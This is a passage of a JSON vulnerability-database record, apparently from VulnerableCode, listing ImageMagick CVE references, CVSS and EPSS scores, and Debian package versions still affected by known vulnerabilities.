"reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1558", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1558" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801681", "reference_id": "1801681", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801681" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16713", "reference_id": "CVE-2019-16713", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:N/I:N/A:P" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16713" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-16713" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-acgu-hc83-yubn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82351?format=api", "vulnerability_id": "VCID-aej5-sgf8-7uhp", "summary": "ImageMagick: heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a height of zero is mishandled", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13297.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13297.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00297", "scoring_system": "epss", "scoring_elements": "0.53043", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00297", "scoring_system": "epss", "scoring_elements": "0.53077", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53536", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53562", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53531", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53581", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53577", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53627", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53609", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53592", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53629", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53634", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53513", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": 